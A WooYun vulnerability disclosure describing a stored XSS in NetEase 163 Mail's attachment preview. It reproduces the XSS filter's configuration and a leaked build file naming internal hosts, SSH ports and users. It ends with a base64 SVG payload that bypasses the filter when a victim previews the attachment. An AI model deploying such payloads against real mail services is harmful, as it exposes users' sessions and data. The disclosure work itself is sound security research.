当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170351

漏洞标题:163网易邮箱存储型XSS漏洞

相关厂商:网易

漏洞作者: mramydnei

提交时间:2016-01-16 13:10

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:XSS 跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-16: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

主要是抛出了一个异常,让问题变得简单了许多

详细说明:

通过网易邮箱测试内容量较大的htm文件的预览时,抛出了了这样的异常。

com.netease.mail.preview.exception.ProxyException: com.netease.security.xssdefender.filter.exception.TimeoutException: XSS filter timeouted!


感觉类名挺个性的,就去github找了一下。发现了这个:

https://github.com/RyanTech/spider-2/


build.xml中多处出现163.org,netease的字样。这多半是和网易脱离不了干系了。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE project [<!ENTITY buildfile SYSTEM "file:./build-user.xml">]>
<!-- WARNING: Eclipse autogenerated file. 
              Any modifications will be overwritten.
              Please edit build-user.xml instead.
-->
<project basedir="." default="release" name="pris-fetcher">
	<property name="bin.dir" value="bin" />
	<property name="lib.dir" value="lib" />
	<property name="build.dir" value="build"/>
	<property name="release.dir" value="release"/>
	<property name="release.lib" value="release/lib"/>
	<property name="release.conf" value="release/conf"/>
	<property name="ssh.keyfile" value="e:/id_rsa"/>
	<!--清理任务-->
	<target name="clean">
		<delete dir="${build.dir}"/>
	</target>
	
	<!--创建目录-->
	<target name="init" depends="clean">
		<mkdir dir="${build.dir}"/>
	</target>
	
	<path id="classpath">
		<fileset dir="${lib.dir}">
			<include name="*.jar"/>
		</fileset>		
  	</path>
	
	<target name="build" depends="init" description="Build jar">
		<jar jarfile="${build.dir}/common.jar" basedir="${bin.dir}">
			<include name="com/netease/backend/collector/rss/common/**/*.class"/>
			<exclude name="com/netease/backend/collector/rss/common/**/*Test.class"/>
		</jar>
		<jar jarfile="${build.dir}/crawler.jar" basedir="${bin.dir}">
			<include name="com/netease/backend/collector/rss/crawler/**/*.class"/>
			<include name="org/archive/crawler/**/*.class"/>
			<exclude name="com/netease/backend/collector/rss/crawler/**/*Test.class"/>
		</jar>
		<jar jarfile="${build.dir}/manager.jar" basedir="${bin.dir}">
			<include name="com/netease/backend/collector/rss/manager/**/*.class"/>
			<exclude name="com/netease/backend/collector/rss/manager/**/*Test.class"/>
		</jar>
	</target>
		
	<target name="common-release" depends="build">
		<delete>
			<fileset dir="${release.lib}" includes="*.jar"/>
		</delete>
		<copy todir="${release.lib}">
			<fileset dir="${build.dir}">
				<include name="*.jar"/>
			</fileset>	
		</copy>
		<copy todir="${release.lib}">
			<fileset dir="${lib.dir}">
				<include name="fetcher-common*.jar" />
				<include name="dcas-analyzer*.jar" />
			</fileset>	
		</copy>
	</target>
	<!--release version-->
	<target name="release" depends="common-release">
		<delete>
			<fileset dir="${release.conf}">
				<exclude name="**/.svn**" />
			</fileset>
		</delete>
		<move todir="${release.conf}">
			<fileset dir="${release.conf}">
			</fileset>
			<mapper type="regexp" from="^(.*)-online.(.*)$$" to="\1.\2" />
		</move>	
	</target>
	
	<target name="test" depends="common-release">
		<delete>
			<fileset dir="${release.dir}/test-conf">
				<exclude name="**/.svn**" />
			</fileset>
		</delete>
	</target>
	
	<!--测试服务器重新启动-->
	<target name="restart-test">
		<sshexec host="app-61.photo.163.org" port="1046"
		    username="yuedu" trust="true" keyfile="${ssh.keyfile}" 
			command="cd /home/yuedu/pris-fetcher/;svn up lib/ rss-lib/ common-conf/;
			sh duplicationFilter/bin/df.sh;sh start.sh;"/>
	</target>
	
	<!--线上升级,所有节点更新jar和conf配置文件,然后重启所有节点-->
	<target name="upgrade-online">
		<sshexec host="yuedu4.photo.163.org" port="1046"
		    username="yuedu" trust="true" keyfile="${ssh.keyfile}" 
			command="cd /home/yuedu/pris-fetcher/;svn up lib/ rss-lib/;sh start-df.sh;sh start.sh;
			 cd /mnt/hdir/0/dcas-default;sh start.sh;"/>
		<sshexec host="yuedu5.photo.163.org" port="1046"
		    username="yuedu" trust="true" keyfile="${ssh.keyfile}" 
			command="cd /mnt/hdir/0/pris-fetcher-news/;svn up lib/ rss-lib/;
			cd /home/yuedu/pris-fetcher-photo/;sh start.sh;"/>
		<sshexec host="app-57.photo.163.org" port="1046"
		    username="dir" trust="true" keyfile="${ssh.keyfile}" 
			command="cd /home/dir/pris-fetcher-2/;svn up lib/ rss-lib/;sh start.sh;
			cd ../pris-fetcher-news-2/;sh start.sh;"/>
		<sshexec host="app-48.photo.163.org" port="1046"
		    username="dir" trust="true" keyfile="${ssh.keyfile}" 
			command="cd /home/dir/pris-fetcher-2/;svn up lib/ rss-lib/;sh start.sh;"/>
	</target>
</project>


果断把下面的jar抱回家看了下,xss怎么过滤的:

https://github.com/RyanTech/spider-2/blob/master/lib/xssdefender-1.3.6.jar


看了下base-config.properties:

######################################
# base configuration for XSS Defender
# @author: superekcah
# format:
# 	string|value
#	set|value1,value2
#	map|key1:value1,value2;key2:value3,value4
######################################
# 标签处理的实现类
tagHandler=string|com.netease.security.xssdefender.filter.NodeFilter
# 报警接口实现类
alarm=string|
# 标签白名单,空表示不使用白名单过滤
tagsWhitelist=set|
# 需要去除的标签,包括标签内容及子节点
removeNodeTags=set|head,script,style,object,applet,noscript,frameset,noframes
# 需要去除的标签本身,不包括内容及子节点
removeTagOnlyTags=set|form,meta,body,html,label,select,optgroup,option,textarea,title,script,xmp,applet,embed,head,frameset,iframe,noframes,noscript,object,style,input,base,basefont,isindex,link,frame,param,xml,xss
# 指定标签需要过滤的属性
nodeAttrBlacklist=map|
# 指定标签允许保留的属性
nodeAttrWhitelist=map|img:src,alt,width,height;a:href,target,class;
# 属性中需要检查的关键字,注:只检查是 否以这些词开始
scriptKeywords=set|javascript,vbscript,script,actionscript
# 允许保留的CSS样式,注:如果set中只有一个值all,则允许所有样式
allowedStyleProps=set|font,font-size,font-weight,font-style,text-decoration,width,height,border,margin,padding
# 通过正则表达验证URL属性,default对应默认检查项,空则表达只检查是否关键词开头
urlValidators=map|default:^(https?://|/|#|mailto\\s*:).*
# 需要过滤的属性,/regex/为正则表达,其他要求逐字匹配
forbidAttributes=set|/on[a-zA-Z]+/,allowScriptAccess,allowNetworking,disabled
# 需要检查关键词开始的属性
keywordsCheckedAttributes=set|background


过滤了什么没过滤什么一目了然,也就没啥好分析的了。
构造poc,pwn之。

漏洞证明:

将下面的内容存储为pwn.htm

<svg>
<use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i
NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></svg>


添加到邮件附件,发送给victim。victim对文件进行浏览时:

屏幕快照 2016-01-16 下午1.51.09.png


游戏就结束了。上面的poc需要在ff下进行验证。
如果觉得影响范围不足够,可以和我联系。我可以进行进一步提供更通用的poc。
最后,如果上述问题属于coremail的问题,麻烦告知一下我好去拿奖金。

修复方案:

removeNodeTags加一个svg?

版权声明:转载请注明来源 mramydnei@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-19 15:38

厂商回复:

漏洞已确认,将于近期修复,感谢您对网易产品的关注。

最新状态:

暂无